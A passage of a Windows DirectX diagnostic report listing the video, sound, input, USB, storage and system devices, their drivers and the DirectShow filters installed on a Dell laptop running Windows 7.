{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX
VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend D3D9 Overlay: Supported DXVA-HD: Supported DDraw Status: Enabled D3D Status: Enabled AGP Status: Enabled
-------------
Sound Devices
-------------
Description: Speakers (High Definition Audio Device)
Default Sound Playback: Yes
Default Voice Playback: Yes
Hardware ID: HDAUDIO\FUNC_01&VEN_111D&DEV_76B2&SUBSYS_102802AA&REV_1003
Manufacturer ID: 1
Product ID: 65535
Type: WDM
Driver Name: HdAudio.sys
Driver Version: 6.01.7601.17514 (English)
Driver Attributes: Final Retail
WHQL Logo'd: Yes
Date and Size: 11/20/2010 06:00:21, 304128 bytes
Other Files:
Driver Provider: Microsoft
HW Accel Level: Basic
Cap Flags: 0xF1F
Min/Max Sample Rate: 100, 200000
Static/Strm HW Mix Bufs: 1, 0
Static/Strm HW 3D Bufs: 0, 0
HW Memory: 0
Voice Management: No
EAX(tm) 2.0 Listen/Src: No, No
I3DL2(tm) Listen/Src: No, No
Sensaura(tm) ZoomFX(tm): No

---------------------
Sound Capture Devices
---------------------
Description: Microphone (High Definition Audio Device)
Default Sound Capture: Yes
Default Voice Capture: Yes
Driver Name: HdAudio.sys
Driver Version: 6.01.7601.17514 (English)
Driver Attributes: Final Retail
Date and Size: 11/20/2010 06:00:21, 304128 bytes
Cap Flags: 0x1
Format Flags: 0xFFFFF
-------------------
DirectInput Devices
-------------------
Device Name: Mouse
Attached: 1
Controller ID: n/a
Vendor/Product ID: n/a
FF Driver: n/a

Device Name: Keyboard
Attached: 1
Controller ID: n/a
Vendor/Product ID: n/a
FF Driver: n/a

Device Name: Microsoft Hardware USB Mouse
Attached: 1
Controller ID: 0x0
Vendor/Product ID: 0x045E, 0x0745
FF Driver: n/a

Device Name: Micr
Attached: 1
Controller ID: 0x0
Vendor/Product ID: 0x045E, 0x0745
FF Driver: n/a

Device Name: Micr
Attached: 1
Controller ID: 0x0
Vendor/Product ID: 0x045E, 0x0745
FF Driver: n/a

Device Name: Micr
Attached: 1
Controller ID: 0x0
Vendor/Product ID: 0x045E, 0x0745
FF Driver: n/a

Device Name: Micr
Attached: 1
Controller ID: 0x0
Vendor/Product ID: 0x045E, 0x0745
FF Driver: n/a

Poll w/ Interrupt: No
-----------
USB Devices
-----------
+ USB Root Hub
| Vendor/Product ID: 0x8086, 0x2936
| Matching Device ID: usb\root_hub
| Service: usbhub
| Driver: usbhub.sys, 3/24/2011 22:58:37, 258560 bytes
| Driver: usbd.sys, 3/24/2011 22:57:53, 5888 bytes

----------------
Gameport Devices
----------------
------------
PS/2 Devices
------------
+ Standard PS/2 Keyboard
| Matching Device ID: *pnp0303
| Service: i8042prt
| Driver: i8042prt.sys, 7/13/2009 19:11:24, 80896 bytes
| Driver: kbdclass.sys, 7/13/2009 21:20:36, 42576 bytes
|
+ HID Keyboard Device
| Vendor/Product ID: 0x045E, 0x0745
| Matching Device ID: hid_device_system_keyboard
| Service: kbdhid
| Driver: kbdhid.sys, 11/20/2010 05:50:10, 28160 bytes
| Driver: kbdclass.sys, 7/13/2009 21:20:36, 42576 bytes
|
+ Terminal Server Keyboard Driver
| Matching Device ID: root\rdp_kbd
| Upper Filters: kbdclass
| Service: TermDD
| Driver: i8042prt.sys, 7/13/2009 19:11:24, 80896 bytes
| Driver: kbdclass.sys, 7/13/2009 21:20:36, 42576 bytes
|
+ PS/2 Compatible Mouse
| Matching Device ID: *pnp0f13
| Service: i8042prt
| Driver: i8042prt.sys, 7/13/2009 19:11:24, 80896 bytes
| Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes
|
+ Microsoft USB Dual Receiver Wireless Mouse (IntelliPoint)
| Vendor/Product ID: 0x045E, 0x0745
| Matching Device ID: hid\vid_045e&pid_0745&mi_01&col01
| Upper Filters: Point32
| Service: mouhid
| Driver: point32.sys, 8/1/2011 15:56:42, 40936 bytes
| Driver: mouhid.sys, 7/13/2009 19:45:08, 26112 bytes
| Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes
| Driver: wdfcoinstaller01009.dll, 7/7/2010 18:18:56, 1461992 bytes
|
+ HID-compliant mouse
| Vendor/Product ID: 0x413C, 0x3016
| Matching Device ID: hid_device_system_mouse
| Service: mouhid
| Driver: mouhid.sys, 7/13/2009 19:45:08, 26112 bytes
| Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes
|
+ Terminal Server Mouse Driver
| Matching Device ID: root\rdp_mou
| Upper Filters: mouclass
| Service: TermDD
| Driver: termdd.sys, 11/20/2010 08:30:12, 53120 bytes
| Driver: sermouse.sys, 7/13/2009 19:45:08, 19968 bytes
| Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes
------------------------
Disk & DVD/CD-ROM Drives
------------------------
Drive: C:
Free Space: 35.9 GB
Total Space: 137.6 GB
File System: NTFS
Model: ST9160310AS

Drive: E:
Free Space: 0.0 GB
Total Space: 15.0 GB
File System: NTFS
Model: ST9160310AS

Drive: G:
Model: Kingston DTVault Privacy USB Device
Driver: c:\windows\system32\drivers\cdrom.sys, 6.01.7601.17514 (English), 11/20/2010 04:38:10, 108544 bytes

Drive: D:
Model: Optiarc DVD+-RW AD-7580S
Driver: c:\windows\system32\drivers\cdrom.sys, 6.01.7601.17514 (English), 11/20/2010 04:38:10, 108544 bytes
--------------
System Devices
--------------
Name: Intel(R) ICH9 Family PCI Express Root Port 1 - 2940
Device ID: PCI\VEN_8086&DEV_2940&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E0
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes

Name: Intel(R) ICH9 Family USB Universal Host Controller - 2935
Device ID: PCI\VEN_8086&DEV_2935&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E9
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: High Definition Audio Controller
Device ID: PCI\VEN_8086&DEV_293E&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D8
Driver: C:\Windows\system32\DRIVERS\hdaudbus.sys, 6.01.7601.17514 (English), 11/20/2010 05:59:29, 108544 bytes

Name: Intel(R) ICH9 Family USB Universal Host Controller - 2934
Device ID: PCI\VEN_8086&DEV_2934&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E8
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: Mobile Intel(R) 4 Series Express Chipset Family
Device ID: PCI\VEN_8086&DEV_2A43&SUBSYS_02AA1028&REV_07\3&18D45AA6&0&11
Driver: n/a

Name: Intel(R) ICH9 Family USB2 Enhanced Host Controller - 293C
Device ID: PCI\VEN_8086&DEV_293C&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D7
Driver: C:\Windows\system32\drivers\usbehci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:58, 43008 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: Intel(R) ICH9 Family SMBus Controller - 2930
Device ID: PCI\VEN_8086&DEV_2930&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&FB
Driver: n/a
Name: Mobile Intel(R) 4 Series Express Chipset Family Device ID: PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028&REV_07\3&18D45AA6&0&10 Driver: C:\Windows\system32\DRIVERS\igdkmd32.sys, 8.15.0010.2302 (English), 2/11/2011 19:12:16, 9036800 bytes Driver: C:\Windows\system32\igdumd32.dll, 8.15.0010.2302 (English), 2/11/2011 19:12:16, 4967424 bytes Driver: C:\Windows\system32\igkrng500.bin, 4/21/2010 18:08:14, 982240 bytes Driver: C:\Windows\system32\igcompkrng500.bin, 4/21/2010 18:08:14, 439308 bytes Driver: C:\Windows\system32\igfcg500m.bin, 4/21/2010 18:08:14, 92356 bytes Driver: C:\Windows\system32\iglhxs32.vp, 2/11/2011 19:42:52, 51636 bytes Driver: C:\Windows\system32\iglhxo32.vp, 4/21/2010 17:22:50, 60015 bytes Driver: C:\Windows\system32\iglhxc32.vp, 4/21/2010 17:22:50, 60226 bytes Driver: C:\Windows\system32\iglhxg32.vp, 4/21/2010 17:22:52, 60254 bytes Driver: C:\Windows\system32\iglhxa32.vp, 4/21/2010 17:22:50, 1090 bytes Driver: C:\Windows\system32\iglhxa32.cpa, 4/21/2010 17:22:50, 1921265 bytes Driver: C:\Windows\system32\iglhcp32.dll, 1.05.0002.0001 (English), 2/11/2011 18:35:00, 147456 bytes Driver: C:\Windows\system32\iglhsip32.dll, 1.05.0002.0001 (English), 2/11/2011 18:35:00, 208896 bytes Driver: C:\Windows\system32\hccutils.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:48, 95232 bytes Driver: C:\Windows\system32\igfxsrvc.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:12, 57856 bytes Driver: C:\Windows\system32\igfxsrvc.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:30, 267800 bytes Driver: C:\Windows\system32\igfxpph.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:30, 195584 bytes Driver: C:\Windows\system32\igfxcpl.cpl, 8.15.0010.2302 (English), 2/11/2011 18:41:30, 115200 bytes Driver: C:\Windows\system32\igfxdev.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:38, 228864 bytes Driver: C:\Windows\system32\igfxdo.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:56, 130048 bytes Driver: C:\Windows\system32\igfxtray.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:32, 
137752 bytes Driver: C:\Windows\system32\hkcmd.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:26, 171032 bytes Driver: C:\Windows\system32\igfxress.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:38, 828928 bytes Driver: C:\Windows\system32\igfxpers.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:30, 172568 bytes Driver: C:\Windows\system32\igfxTMM.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:30, 261632 bytes Driver: C:\Windows\system32\TVWSetup.exe, 1.00.0001.0000 (English), 2/11/2011 19:26:38, 8198680 bytes Driver: C:\Windows\system32\gfxSrvc.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:42, 120320 bytes Driver: C:\Windows\system32\GfxUI.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:22, 3157528 bytes Driver: C:\Windows\system32\GfxUI.exe.config, 4/21/2010 17:29:46, 151 bytes Driver: C:\Windows\system32\IGFXDEVLib.dll, 1.00.0000.0000 (Invariant Language), 2/11/2011 18:40:40, 4096 bytes Driver: C:\Windows\system32\igfxext.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:28, 179224 bytes Driver: C:\Windows\system32\igfxexps.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:28, 23552 bytes Driver: C:\Windows\system32\igfxrara.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 84480 bytes Driver: C:\Windows\system32\igfxrchs.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 81920 bytes Driver: C:\Windows\system32\igfxrcht.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 81920 bytes Driver: C:\Windows\system32\igfxrdan.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 84992 bytes Driver: C:\Windows\system32\igfxrdeu.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 86016 bytes Driver: C:\Windows\system32\igfxrenu.lrc, 8.15.0010.2302 (English), 2/11/2011 18:40:38, 85504 bytes Driver: C:\Windows\system32\igfxresn.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 86528 bytes Driver: C:\Windows\system32\igfxrfin.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 85504 bytes Driver: C:\Windows\system32\igfxrfra.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 86528 
bytes Driver: C:\Windows\system32\igfxrheb.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 84480 bytes Driver: C:\Windows\system32\igfxrita.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 86016 bytes Driver: C:\Windows\system32\igfxrjpn.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 82944 bytes Driver: C:\Windows\system32\igfxrkor.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 82944 bytes Driver: C:\Windows\system32\igfxrnld.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 86016 bytes Driver: C:\Windows\system32\igfxrnor.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 85504 bytes Driver: C:\Windows\system32\igfxrplk.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 86016 bytes Driver: C:\Windows\system32\igfxrptb.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 85504 bytes Driver: C:\Windows\system32\igfxrptg.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 86016 bytes Driver: C:\Windows\system32\igfxrrus.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 86016 bytes Driver: C:\Windows\system32\igfxrsky.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 86016 bytes Driver: C:\Windows\system32\igfxrslv.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 85504 bytes Driver: C:\Windows\system32\igfxrsve.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 85504 bytes Driver: C:\Windows\system32\igfxrtha.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 84992 bytes Driver: C:\Windows\system32\igfxrcsy.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 85504 bytes Driver: C:\Windows\system32\igfxrell.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 86528 bytes Driver: C:\Windows\system32\igfxrhun.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 85504 bytes Driver: C:\Windows\system32\igfxrtrk.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 85504 bytes Driver: C:\Windows\system32\Gfxres.ar-SA.resources, 2/11/2011 18:44:12, 139851 bytes Driver: C:\Windows\system32\Gfxres.cs-CZ.resources, 2/11/2011 18:44:14, 118687 bytes Driver: 
C:\Windows\system32\Gfxres.da-DK.resources, 2/11/2011 18:44:14, 114203 bytes Driver: C:\Windows\system32\Gfxres.de-DE.resources, 2/11/2011 18:44:16, 122651 bytes Driver: C:\Windows\system32\Gfxres.el-GR.resources, 2/11/2011 18:44:16, 178349 bytes Driver: C:\Windows\system32\Gfxres.es-ES.resources, 2/11/2011 18:44:18, 122869 bytes Driver: C:\Windows\system32\Gfxres.en-US.resources, 8/25/2010 20:02:24, 110156 bytes Driver: C:\Windows\system32\Gfxres.fi-FI.resources, 2/11/2011 18:44:20, 118639 bytes Driver: C:\Windows\system32\Gfxres.fr-FR.resources, 2/11/2011 18:44:20, 120742 bytes Driver: C:\Windows\system32\Gfxres.he-IL.resources, 2/11/2011 18:44:22, 133688 bytes Driver: C:\Windows\system32\Gfxres.hu-HU.resources, 2/11/2011 18:44:22, 119558 bytes Driver: C:\Windows\system32\Gfxres.it-IT.resources, 2/11/2011 18:44:24, 125500 bytes Driver: C:\Windows\system32\Gfxres.ja-JP.resources, 2/11/2011 18:44:24, 136343 bytes Driver: C:\Windows\system32\Gfxres.ko-KR.resources, 2/11/2011 18:44:26, 123172 bytes Driver: C:\Windows\system32\Gfxres.nb-NO.resources, 2/11/2011 18:44:28, 114794 bytes Driver: C:\Windows\system32\Gfxres.nl-NL.resources, 2/11/2011 18:44:28, 119528 bytes Driver: C:\Windows\system32\Gfxres.pl-PL.resources, 2/11/2011 18:44:30, 118351 bytes Driver: C:\Windows\system32\Gfxres.pt-BR.resources, 2/11/2011 18:44:30, 120308 bytes Driver: C:\Windows\system32\Gfxres.pt-PT.resources, 2/11/2011 18:44:32, 119009 bytes Driver: C:\Windows\system32\Gfxres.ru-RU.resources, 2/11/2011 18:44:32, 165337 bytes Driver: C:\Windows\system32\Gfxres.sk-SK.resources, 2/11/2011 18:44:34, 118000 bytes Driver: C:\Windows\system32\Gfxres.sl-SI.resources, 2/11/2011 18:44:36, 114314 bytes Driver: C:\Windows\system32\Gfxres.sv-SE.resources, 2/11/2011 18:44:36, 119302 bytes Driver: C:\Windows\system32\Gfxres.th-TH.resources, 2/11/2011 18:44:38, 189494 bytes Driver: C:\Windows\system32\Gfxres.tr-TR.resources, 2/11/2011 18:44:38, 121115 bytes Driver: C:\Windows\system32\Gfxres.zh-CN.resources, 
2/11/2011 18:44:40, 102825 bytes Driver: C:\Windows\system32\Gfxres.zh-TW.resources, 2/11/2011 18:44:40, 103986 bytes Driver: C:\Windows\system32\ig4icd32.dll, 8.15.0010.2302 (English), 2/11/2011 18:51:10, 11039744 bytes Driver: C:\Windows\system32\igd10umd32.dll, 8.15.0010.2302 (English), 2/11/2011 19:04:40, 4411392 bytes Driver: C:\Windows\system32\d3dx10_40.dll, 9.24.0950.2656 (English), 8/13/2009 22:09:44, 452440 bytes Driver: C:\Windows\system32\igdumdx32.dll, 8.15.0010.2302 (English), 2/11/2011 19:09:48, 571904 bytes Driver: C:\Windows\system32\igfxCoIn_v2302.dll, 1.02.0030.0000 (English), 2/11/2011 19:20:00, 81920 bytes
Name: Intel(R) ICH9 Family USB2 Enhanced Host Controller - 293A
Device ID: PCI\VEN_8086&DEV_293A&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&EF
Driver: C:\Windows\system32\drivers\usbehci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:58, 43008 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: Intel(R) ICH9M-E/M SATA AHCI Controller
Device ID: PCI\VEN_8086&DEV_2929&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&FA
Driver: C:\Windows\system32\DRIVERS\iaStor.sys, 10.05.0000.1029 (English), 6/15/2011 09:00:28, 461080 bytes
Driver: C:\Windows\system32\RSTCoin.dll, 1.03.0001.0000 (English), 6/15/2011 09:20:52, 105240 bytes
Driver: C:\Windows\RST_UI.cab, , 0 bytes

Name: Mobile Intel(R) 4 Series Chipset Processor to DRAM Controller - 2A40
Device ID: PCI\VEN_8086&DEV_2A40&SUBSYS_02AA1028&REV_07\3&18D45AA6&0&00
Driver: n/a

Name: Intel(R) ICH9 Family USB Universal Host Controller - 2939
Device ID: PCI\VEN_8086&DEV_2939&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D2
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: Intel(R) ICH9M LPC Interface Controller - 2919
Device ID: PCI\VEN_8086&DEV_2919&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&F8
Driver: C:\Windows\system32\DRIVERS\msisadrv.sys, 6.01.7600.16385 (English), 7/13/2009 21:20:43, 13888 bytes

Name: Intel(R) ICH9 Family PCI Express Root Port 5 - 2948
Device ID: PCI\VEN_8086&DEV_2948&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E4
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes

Name: Intel(R) ICH9 Family USB Universal Host Controller - 2938
Device ID: PCI\VEN_8086&DEV_2938&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D1
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: Intel(R) 82801 PCI Bridge - 2448
Device ID: PCI\VEN_8086&DEV_2448&SUBSYS_02AA1028&REV_93\3&18D45AA6&0&F0
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes

Name: Intel(R) ICH9 Family PCI Express Root Port 3 - 2944
Device ID: PCI\VEN_8086&DEV_2944&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E2
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes

Name: Intel(R) ICH9 Family USB Universal Host Controller - 2937
Device ID: PCI\VEN_8086&DEV_2937&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D0
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: Dell Wireless 1397 WLAN Mini-Card
Device ID: PCI\VEN_14E4&DEV_4315&SUBSYS_000C1028&REV_01\4&1B317842&0&00E1
Driver: C:\Windows\system32\DRIVERS\BCMWL6.SYS, 5.30.0021.0000 (English), 7/8/2009 01:45:32, 2506232 bytes
Driver: C:\Windows\system32\drivers\vwifibus.sys, 6.01.7600.16385 (English), 7/13/2009 19:52:02, 19968 bytes

Name: Intel(R) ICH9 Family PCI Express Root Port 2 - 2942
Device ID: PCI\VEN_8086&DEV_2942&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E1
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes

Name: Intel(R) ICH9 Family USB Universal Host Controller - 2936
Device ID: PCI\VEN_8086&DEV_2936&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&EA
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes

Name: Marvell Yukon 88E8040 PCI-E Fast Ethernet Controller
Device ID: PCI\VEN_11AB&DEV_4354&SUBSYS_02AA1028&REV_13\4&2AC8D8A2&0&00E2
Driver: n/a
------------------ DirectShow Filters ------------------
DirectShow Filters: WMAudio Decoder DMO,0x00800800,1,1,WMADMOD.DLL,6.01.7601.17514 WMAPro over S/PDIF DMO,0x00600800,1,1,WMADMOD.DLL,6.01.7601.17514 WMSpeech Decoder DMO,0x00600800,1,1,WMSPDMOD.DLL,6.01.7601.17514 MP3 Decoder DMO,0x00600800,1,1,mp3dmod.dll,6.01.7600.16385 Mpeg4s Decoder DMO,0x00800001,1,1,mp4sdecd.dll,6.01.7600.16385 WMV Screen decoder DMO,0x00600800,1,1,wmvsdecd.dll,6.01.7601.17514 WMVideo Decoder DMO,0x00800001,1,1,wmvdecod.dll,6.01.7601.17514 Mpeg43 Decoder DMO,0x00800001,1,1,mp43decd.dll,6.01.7600.16385 Mpeg4 Decoder DMO,0x00800001,1,1,mpg4decd.dll,6.01.7600.16385 CyberLink AudioCD Filter,0x00600000,0,1,CLAudioCD.ax,5.00.0000.4417 WMT VIH2 Fix,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 Record Queue,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 WMT Switch Filter,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 WMT Virtual Renderer,0x00200000,1,0,WLXVAFilt.dll,15.04.3538.0513 WMT DV Extract,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 WMT Virtual Source,0x00200000,0,1,WLXVAFilt.dll,15.04.3538.0513 WMT Sample Information Filter,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 DV Muxer,0x00400000,0,0,qdv.dll,6.06.7601.17514 CyberLink Audio Wizard,0x00200001,1,1,CLAudWizard.ax,1.00.0000.3616 Color Space Converter,0x00400001,1,1,quartz.dll,6.06.7601.17713 WM ASF Reader,0x00400000,0,0,qasf.dll,12.00.7601.17514 Screen Capture filter,0x00200000,0,1,wmpsrcwp.dll,12.00.7601.17514 AVI Splitter,0x00600000,1,1,quartz.dll,6.06.7601.17713 VGA 16 Color Ditherer,0x00400000,1,1,quartz.dll,6.06.7601.17713 SBE2MediaTypeProfile,0x00200000,0,0,sbe.dll,6.06.7601.17528 Microsoft DTV-DVD Video Decoder,0x005fffff,2,4,msmpeg2vdec.dll,6.01.7140.0000 CyberLink DVD Navigator,0x00200000,0,3,CLNavX.ax,8.00.0000.0121 AC3 Parser Filter,0x00600000,1,1,mpg2splt.ax,6.06.7601.17528 StreamBufferSink,0x00200000,0,0,sbe.dll,6.06.7601.17528 Microsoft TV Captions Decoder,0x00200001,1,0,MSTVCapn.dll,6.01.7601.17715 MJPEG Decompressor,0x00600000,1,1,quartz.dll,6.06.7601.17713 CBVA DMO wrapper 
filter,0x00200000,1,1,cbva.dll,6.01.7601.17514 MPEG-I Stream Splitter,0x00600000,1,2,quartz.dll,6.06.7601.17713 SAMI (CC) Parser,0x00400000,1,1,quartz.dll,6.06.7601.17713 CyberLink Audio Spectrum Analyzer,0x00200000,1,1,CLAudSpa.ax,1.00.0000.0924 VBI Codec,0x00600000,1,4,VBICodec.ax,6.06.7601.17514 MPEG-2 Splitter,0x005fffff,1,0,mpg2splt.ax,6.06.7601.17528 Closed Captions Analysis Filter,0x00200000,2,5,cca.dll,6.06.7601.17514 SBE2FileScan,0x00200000,0,0,sbe.dll,6.06.7601.17528 Microsoft MPEG-2 Video Encoder,0x00200000,1,1,msmpeg2enc.dll,6.01.7601.17514 CyberLink Demultiplexer,0x00200000,1,0,cldemuxer.ax,1.00.0000.4528 Internal Script Command Renderer,0x00800001,1,0,quartz.dll,6.06.7601.17713 MPEG Audio Decoder,0x03680001,1,1,quartz.dll,6.06.7601.17713 DV Splitter,0x00600000,1,2,qdv.dll,6.06.7601.17514 Video Mixing Renderer 9,0x00200000,1,0,quartz.dll,6.06.7601.17713 Haali Media Splitter,0x00600001,0,1,, Microsoft MPEG-2 Encoder,0x00200000,2,1,msmpeg2enc.dll,6.01.7601.17514 ACM Wrapper,0x00600000,1,1,quartz.dll,6.06.7601.17713 Video Renderer,0x00800001,1,0,quartz.dll,6.06.7601.17713 MPEG-2 Video Stream Analyzer,0x00200000,0,0,sbe.dll,6.06.7601.17528 Line 21 Decoder,0x00600000,1,1,qdvd.dll,6.06.7601.17713 Video Port Manager,0x00600000,2,1,quartz.dll,6.06.7601.17713 Video Renderer,0x00400000,1,0,quartz.dll,6.06.7601.17713 File Writer,0x00200000,1,0,WLXVAFilt.dll,15.04.3538.0513 VPS Decoder,0x00200000,0,0,WSTPager.ax,6.06.7601.17514 WM ASF Writer,0x00400000,0,0,qasf.dll,12.00.7601.17514 VBI Surface Allocator,0x00600000,1,1,vbisurf.ax,6.01.7601.17514 CyberLink Audio Decoder,0x00200000,1,1,Claud.ax,6.03.0000.1124 File writer,0x00200000,1,0,qcap.dll,6.06.7601.17514 iTV Data Sink,0x00600000,1,0,itvdata.dll,6.06.7601.17514 iTV Data Capture 